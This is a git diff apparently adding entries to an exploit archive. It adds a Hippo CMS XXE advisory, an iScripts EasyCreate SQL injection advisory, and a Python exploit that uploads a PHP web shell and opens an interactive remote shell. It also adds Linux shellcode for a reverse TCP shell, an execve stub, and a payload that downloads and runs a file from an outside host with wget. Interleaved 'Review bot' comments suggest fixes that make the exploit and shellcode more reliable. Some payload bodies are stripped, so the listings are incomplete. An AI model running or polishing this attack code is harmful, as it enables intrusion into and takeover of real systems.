diff --git a/files.csv b/files.csv
index fffeae115..c6a7552e8 100755
--- a/files.csv
+++ b/files.csv
@@ -32489,6 +32489,7 @@ id,file,description,date,author,platform,type,port
36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
+39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
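Review bot: The new 39386 row is inserted between ids 36038 and 36042 in this hunk, which breaks the ascending id order the surrounding rows keep; it belongs in the second hunk of this file, after the 39385 row and directly before the 39387 row it pairs with. The row's other fields (path, date, author, platform, type, port 80) are consistent with the sibling 39387 entry, so only its position needs to change.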
@@ -35625,3 +35626,13 @@ id,file,description,date,author,platform,type,port
39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
+39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
+39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39389,platforms/lin_x86/shellcode/39389.c,"Linux x86 Download & Execute Shellcode",2016-02-01,B3mB4m,lin_x86,shellcode,0
+39390,platforms/lin_x86-64/shellcode/39390.c,"x86_64 Linux Polymorphic Execve-Stack - 47 bytes",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80
+39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0
+39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
diff --git a/platforms/java/webapps/39391.txt b/platforms/java/webapps/39391.txt
new file mode 100755
index 000000000..eb9785be0
--- /dev/null
+++ b/platforms/java/webapps/39391.txt
@@ -0,0 +1,179 @@
+
+Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
+
+
+Vendor: Hippo B.V.
+Product web page: http://www.onehippo.org
+Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
+
+Summary: Hippo CMS is an open source Java CMS. We built it so you
+can easily integrate it into your existing architecture.
+
+Desc: XXE (XML External Entity) processing through upload of SVG
+images in the CMS, and through XML import in the CMS Console application.
+
+Tested on: Linux 2.6.32-5-xen-amd64
+ Java/1.8.0_66
+ Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5301
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
+
+Vendor: http://www.onehippo.org/security-issues-list/security-12.html
+ http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
+
+
+04.12.2015
+
+---
+
+
+[Request]:
+
+
+POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
+Host: 10.0.2.17
+User-Agent: ZSL_Web_Scanner/2.8
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
+Content-Length: 2101
+Content-Type: multipart/form-data; boundary=---------------------------20443294602274
+Cookie: [OMMITED]
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="id1a0_hf_0"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
+:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:1:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:2:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:1:item:view:1:item:value:widget"
+
+asd
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:3:item:view:1:item:panel:editor"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:3:item:view:1:item:value:widget"
+
+hhhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
+Content-Type: image/svg+xml
+
+ ]
+>
+-----------------------------20443294602274--
+
+
+
+[Response]:
+
+
+
+
+###############################################################################
+
+
+
+
+
+
+
+
+
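Review bot: The SVG part of the request (after the `Content-Type: image/svg+xml` line) shows only a stray `]` and `>`, and the [Response] section is empty, so the advisory as committed documents neither the upload body nor the server reply that demonstrates the disclosure; the markup appears to have been stripped on import and the section should either be restored from the original advisory or explicitly marked as redacted. The same stripping is visible in the empty Payload entries of platforms/php/webapps/39386.txt, the project-file PoC at the end of platforms/windows/dos/39393.txt, and the empty `StringIO('')` upload body in platforms/php/webapps/39387.py. The vendor fix references already listed under `Vendor:` are the useful part for readers and should be kept prominent. `Cookie: [OMMITED]` should read `[OMITTED]`.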
diff --git a/platforms/lin_x86-64/shellcode/39388.c b/platforms/lin_x86-64/shellcode/39388.c
new file mode 100755
index 000000000..ee020bfd8
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39388.c
@@ -0,0 +1,113 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: tcp reverse shell with password polymorphic version v2 135 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+*Copyright: (c) 2016 iQube. (http://iQube.io)
+*Release Date: January 29, 2016
+*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
+* ./bindshell
+* nc -l 4444 -vvv
+*
+
+global _start
+
+_start:
+
+ xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+ xor rsi, rsi
+ mul rsi
+ push byte 0x2 ;pusing argument to the stack
+ pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+ inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
+ push byte 0x29 ; pushing the syscall number into the rax by using stack
+ pop rax
+ syscall
+
+ ; copying the socket descripter from rax to rdi register so that we can use it further
+
+ xchg rax, rdi
+
+ ; server.sin_family = AF_INET
+ ; server.sin_port = htons(PORT)
+ ; server.sin_addr.s_addr = INADDR_ANY
+ ; bzero(&server.sin_zero, 8)
+ ; setting up the data sctructure
+
+ xor rax, rax
+ push rax ; bzero(&server.sin_zero, 8)
+ mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
+ not ebx
+ mov dword [rsp-4], ebx
+ sub rsp , 4 ; adjust the stack
+ xor r9, r9
+ push word 0x5c11 ; port 4444 in network byte order
+ push word 0x02 ; AF_INET
+ push rsp
+ pop rsi
+
+
+ push 0x10
+ pop rdx
+ push 0x2a
+ pop rax
+ syscall
+
+ push 0x3
+ pop rsi ; setting argument to 3
+
+
+
+duplicate:
+ dec esi
+ mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
+ syscall
+ jne duplicate
+
+password_check:
+
+ push rsp
+ pop rsi
+ xor rax, rax ; system read syscall value is 0 so rax is set to 0
+ syscall
+ push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+ pop rax
+ lea rdi, [rel rsi]
+ scasd ; comparing the user input and stored password in the stack
+
+
+execve:
+ xor esi, esi
+ xor r15, r15
+ mov r15w, 0x161f
+ sub r15w, 0x1110
+ push r15
+ mov r15, rsp
+ mov rdi, 0xff978cd091969dd0
+ inc rdi
+ neg rdi
+ mul esi
+ add al, 0x3b
+ push rdi
+ push rsp
+ pop rdi
+ call r15
+
+
+*/
+#include
+#include
+
+unsigned char code[] =\
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x4d\x31\xc9\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
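Review bot: Both `#include` directives in the harness name no header, so the file does not compile as committed; `printf` and `strlen` require `#include <stdio.h>` and `#include <string.h>`, and the angle-bracketed names were presumably lost on import. `main()` with no return type relies on implicit int, which C99 removed; `int main(void)` is the declaration this should carry. The same two problems appear in platforms/lin_x86-64/shellcode/39390.c. In the header comment, the run line `./bindshell` does not match a reverse-shell binary built as `filename`, and nothing visible in the listing after `scasd` branches on the comparison result, so the "with password" description should be reworded or the listing annotated to say what the comparison is meant to gate.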
diff --git a/platforms/lin_x86-64/shellcode/39390.c b/platforms/lin_x86-64/shellcode/39390.c
new file mode 100755
index 000000000..3259cd59c
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39390.c
@@ -0,0 +1,52 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: x86_64 linux Polymorphic execve-stack 47 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+* Copyright: (c) 2016 iQube. (http://iQube.io)
+* Release Date: January 6, 2016
+*Description: X86_64 linux Polymorphic execve-stack 47 bytes
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
+* ./shellcode
+*
+global _start
+
+_start:
+
+ xor esi, esi
+ xor r15, r15
+ mov r15w, 0x161f
+ sub r15w, 0x1110
+ push r15
+ mov r15, rsp
+ mov rdi, 0xff978cd091969dd0
+ inc rdi
+ neg rdi
+ mul esi
+ add al, 0x3b
+ push rdi
+ push rsp
+ pop rdi
+ call r15
+*/
+
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+main()
+{
+
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
+
+
diff --git a/platforms/lin_x86/shellcode/39389.c b/platforms/lin_x86/shellcode/39389.c
new file mode 100755
index 000000000..7b99ed1d7
--- /dev/null
+++ b/platforms/lin_x86/shellcode/39389.c
@@ -0,0 +1,99 @@
+/*
+--------------------------------------------------------------------------------------------------------
+
+[+] Author : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
+[~] Poc : http://imgur.com/hHB4yiQ
+
+
+#We are still working on ROP Chain, stay tuned :)
+
+
+"""
+You can convert it an elf file:
+
+https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/
+
+If you want test:
+ Important : your filename len must be one byte(Weird bug I'll fix it
+soon lol).
+ Default settings for http://b3mb4m.github.io/exec/h
+ Source codes : b3mb4m.github.io/exec/hello.asm
+"""
+
+
+
+00000000 31C0 xor eax,eax
+00000002 B002 mov al,0x2
+00000004 CD80 int 0x80
+00000006 31DB xor ebx,ebx
+00000008 39D8 cmp eax,ebx
+0000000A 743B jz 0x47
+0000000C 31C9 xor ecx,ecx
+0000000E 31DB xor ebx,ebx
+00000010 31C0 xor eax,eax
+00000012 6A05 push byte +0x5
+00000014 89E1 mov ecx,esp
+00000016 89E1 mov ecx,esp
+00000018 89E3 mov ebx,esp
+0000001A B0A2 mov al,0xa2
+0000001C CD80 int 0x80
+0000001E 31C9 xor ecx,ecx
+00000020 31C0 xor eax,eax
+00000022 50 push eax
+00000023 B00F mov al,0xf
+00000025 6A68 push byte +0x68
+00000027 89E3 mov ebx,esp
+00000029 31C9 xor ecx,ecx
+0000002B 66B9FF01 mov cx,0x1ff
+0000002F CD80 int 0x80
+00000031 31C0 xor eax,eax
+00000033 50 push eax
+00000034 6A68 push byte +0x68
+00000036 89E3 mov ebx,esp
+00000038 50 push eax
+00000039 89E2 mov edx,esp
+0000003B 53 push ebx
+0000003C 89E1 mov ecx,esp
+0000003E B00B mov al,0xb
+00000040 CD80 int 0x80
+00000042 31C0 xor eax,eax
+00000044 40 inc eax
+00000045 CD80 int 0x80
+00000047 6A0B push byte +0xb
+00000049 58 pop eax
+0000004A 99 cdq
+0000004B 52 push edx
+0000004C 6865632F68 push dword 0x682f6365
+00000051 682F2F6578 push dword 0x78652f2f
+00000056 68622E696F push dword 0x6f692e62
+0000005B 6869746875 push dword 0x75687469
+00000060 68346D2E67 push dword 0x672e6d34
+00000065 6862336D62 push dword 0x626d3362
+0000006A 89E1 mov ecx,esp
+0000006C 52 push edx
+0000006D 6A74 push byte +0x74
+0000006F 682F776765 push dword 0x6567772f
+00000074 682F62696E push dword 0x6e69622f
+00000079 682F757372 push dword 0x7273752f
+0000007E 89E3 mov ebx,esp
+00000080 52 push edx
+00000081 51 push ecx
+00000082 53 push ebx
+00000083 89E1 mov ecx,esp
+00000085 CD80 int 0x80
+*/
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//30/01/2016 - 02:59:21
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+int main(void){
+ (*(void(*)()) shellcode)();
+}
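Review bot: `int main(void)` falls off the end without a return value; this is permitted for `main` since C99 but older compilers warn, and an explicit `return 0;` makes the harness's intent clear. The annotated disassembly repeats `mov ecx,esp` at offsets 0x14 and 0x16 (confirmed by the `\x89\xe1\x89\xe1` pair in the byte array); the second is redundant and deserves a comment so readers do not look for a side effect. The header comment's note that "your filename len must be one byte" is the only documentation of that limitation and should be stated next to the byte array rather than inside a quoted block.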
diff --git a/platforms/php/webapps/39386.txt b/platforms/php/webapps/39386.txt
new file mode 100755
index 000000000..46ce0e09f
--- /dev/null
+++ b/platforms/php/webapps/39386.txt
@@ -0,0 +1,143 @@
+iScripts EasyCreate 3.0 Multiple Vulnerabilities
+
+
+[Vendor Product Description]
+
+- iScripts EasyCreate is a private label online website builder. This software allows you to start an
+online business by offering website building services to your customers. Equipped with drag and drop
+design functionality, crisp templates and social sharing capabilities, this online website builder
+software will allow you to provide the best website building features to your users.
+
+
+- Site: http://www.iscripts.com
+
+
+[Advisory Timeline]
+
+[17.11.2015] First contact to vendor.
+[08.12.2015] Follow up with vendor. No response received.
+[08.12.2015] Ticket Created using online portal (id #010248399110346).
+[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
+[28.12.2015] Vendor responds asking more details.
+[29.12.2015] Sent details to the vendor.
+[05.01.2016] Follow up with vendor. No response received.
+[14.01.2016] Follow up with vendor. No response received.
+[28.01.2016] Public Security advisory released.
+
+
+[Bug Summary]
+
+- SQL Injection
+
+- Cross Site Scripting (Stored)
+
+- Cross Site Scripting (Reflected)
+
+- Cross Site Request Forgery
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- EasyCreate 3.0
+
+
+[Advisory]
+
+- ZSL-2016-5298
+- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
+
+
+[Bug Description and Proof of Concept]
+
+1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. This can be exploited to perform certain actions
+with administrative privileges if a logged-in user visits a malicious web site
+https://en.wikipedia.org/wiki/Cross-site_request_forgery
+
+2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
+triggered when input passed via multiple parameters is not properly sanitized before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
+https://en.wikipedia.org/wiki/Cross-site_scripting
+
+3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerability. Input passed via a GET
+parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code.
+https://en.wikipedia.org/wiki/SQL_injection
+
+
+
+[Proof-of-Concept]
+
+1. SQL Injection
+
+Parameter:
+siteid (GET)
+
+Payload:
+action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+2. Multiple Stored Cross Site Scripting
+
+Parameter:
+siteName (POST)
+
+Payload:
+Content-Disposition: form-data; name="siteName"
+
+
+
+Parameter:
+selectedimage (POST)
+
+Payload:
+selectedimage=
+
+Parameter:
+filename (POST)
+
+Payload:
+filename=
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+3. Multiple Reflected Cross Site Scripting
+
+Parameter
+catid (GET)
+
+Parameters
+selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+4. Multiple Cross Site Request Forgery (CSRF)
+
+Sample Payload for editing profile:
+
+
+
+
+
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file
diff --git a/platforms/php/webapps/39387.py b/platforms/php/webapps/39387.py
new file mode 100755
index 000000000..617a99ed7
--- /dev/null
+++ b/platforms/php/webapps/39387.py
@@ -0,0 +1,217 @@
+#!C:/Python27/python.exe -u
+#
+#
+# iScripts EasyCreate 3.0 Remote Code Execution Exploit
+#
+#
+# Vendor: iScripts.com
+# Product web page: http://www.iscripts.com
+# Affected version: 3.0
+#
+# Summary: iScripts EasyCreate is a private label online website builder. This
+# software allows you to start an online business by offering website building
+# services to your customers. Equipped with drag and drop design functionality,
+# crisp templates and social sharing capabilities, this online website builder
+# software will allow you to provide the best website building features to your
+# users.
+#
+# Desc: iScripts EasyCreate suffers from an authenticated arbitrary PHP code
+# execution. The vulnerability is caused due to the improper verification of
+# uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST
+# parameter. This can be exploited to execute arbitrary PHP code by uploading
+# a malicious PHP script file with '.php4' extension (to bypass the '.htaccess'
+# block rule) that will be stored in '/uploads/siteimages/thumb/' directory.
+#
+# Tested on: Apache
+# MySQL 5.5.40
+#
+# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2016-5297
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5297.php
+#
+#
+# 17.11.2015
+#
+#
+
+version = '3.0'
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+import requests, httplib
+
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+
+global file
+file = 'abcde2'
+
+init()
+
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def bannerche():
+ print '''
+ @-------------------------------------------------------------@
+ | iScripts EasyCreate 3.0 Remote Code Execution Exploit |
+ | ID: ZSL-2016-5297 |
+ | Copyleft (c) 2016, Zero Science Lab |
+ @-------------------------------------------------------------@
+ '''
+ if len(sys.argv) < 1:
+ print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n'
+ print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
+ sys.exit()
+
+bannerche()
+
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+
+host = sys.argv[1]
+
+cj = cookielib.CookieJar()
+opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+
+opener2.open('http://'+host+'/easycreate/demo/login.php')
+
+print '\x20\x20[*] Login please.'
+
+username = raw_input('\x20\x20[*] Enter username: ')
+password = raw_input('\x20\x20[*] Enter password: ')
+
+login_data = urllib.urlencode({
+ 'vuser_login' : username,
+ 'vuser_password' : password,
+ })
+
+login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
+auth = login.read()
+
+if re.search(r'Invalid username and', auth):
+ print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
+ print
+ sys.exit()
+else:
+ print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+
+response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
+output = response.read()
+
+for session in cj:
+ sessid = session.name
+
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+
+class MultiPartForm(object):
+
+ def __init__(self):
+ self.form_fields = []
+ self.files = []
+ self.boundary = mimetools.choose_boundary()
+ return
+
+ def get_content_type(self):
+ return 'multipart/form-data; boundary=%s' % self.boundary
+
+ def add_field(self, name, value):
+ self.form_fields.append((name, value))
+ return
+
+ def add_file(self, field_name, filename, fileHandle, mimetype=None):
+ body = fileHandle.read()
+ if mimetype is None:
+ mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+ self.files.append((field_name, filename, mimetype, body))
+ return
+
+ def __str__(self):
+
+ parts = []
+ part_boundary = '--' + self.boundary
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: form-data; name="%s"; filename="%s"' % \
+ (field_name, filename),
+ 'Content-Type: application/x-msdownload',
+ '',
+ body,
+ ]
+ for field_name, filename, content_type, body in self.files
+ )
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: form-data; name="%s"' % name,
+ '',
+ value,
+ ]
+ for name, value in self.form_fields
+ )
+
+ flattened = list(itertools.chain(*parts))
+ flattened.append('--' + self.boundary + '--')
+ flattened.append('')
+ return '\r\n'.join(flattened)
+
+if __name__ == '__main__':
+
+ form = MultiPartForm()
+ form.add_file('userImages', 'abcde2.php4',
+ fileHandle=StringIO(''))
+
+
+ request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
+ request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
+ request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
+ request.add_header('Accept-Language', 'en-US,en;q=0.5')
+ body = str(form)
+ request.add_header('Content-type', form.get_content_type())
+ request.add_header('Connection', 'keep-alive')
+ request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
+ request.add_header('Accept-Encoding', 'gzip, deflate')
+ request.add_header('Cookie', cookie)
+ request.add_header('Content-length', len(body))
+ request.add_data(body)
+ request.get_data()
+ urllib2.urlopen(request).read()
+ print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+
+response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
+output = response.read()
+
+for line in output.splitlines():
+ if file in line:
+ filename = str(line.split("=")[2:])[3:84]
+ print filename
+
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+ try:
+ cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+ execute = opener2.open(filename+'cmd='+cmd)
+ reverse = execute.read()
+ print reverse
+
+ if cmd.strip() == 'exit':
+ break
+
+ except Exception:
+ break
+
+sys.exit()
\ No newline at end of file
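Review bot: The argument check `if len(sys.argv) < 1:` in `bannerche()` can never be true because `sys.argv` always contains the script name, so running without a host skips the usage text and fails with an IndexError at `host = sys.argv[1]`; it should read `if len(sys.argv) < 2:`. Later, `filename` is assigned only inside the `if file in line:` loop, so when no gallery line matches, the first `opener2.open(filename+'cmd='+cmd)` raises NameError, which the bare `except Exception: break` silently hides; initialising `filename = None` before the loop and exiting with a message when it is still unset would make that failure visible. `request.get_data()` discards its result and can be dropped, `requests` is imported but never used, and the module-level `global file` statement has no effect while `file` shadows a builtin.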
diff --git a/platforms/windows/dos/39393.txt b/platforms/windows/dos/39393.txt
new file mode 100755
index 000000000..217b864ae
--- /dev/null
+++ b/platforms/windows/dos/39393.txt
@@ -0,0 +1,84 @@
+
+Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
+
+
+Vendor: Autonics Corporation
+Product web page: https://www.autonics.com
+Affected version: 1.7.3 (build 2454)
+ 1.7.0 (build 2333)
+ 1.5.0 (build 2117)
+
+Summary: DAQMaster is comprehensive device management program
+that can be used with Autonics thermometers, panel meters,
+pulse meters, and counters, etc and with Konics recorders,
+indicators. DAQMaster provides GUI control for easy and convenient
+management of parameters and multiple device data monitoring.
+
+Desc: The vulnerability is caused due to a boundary error in the
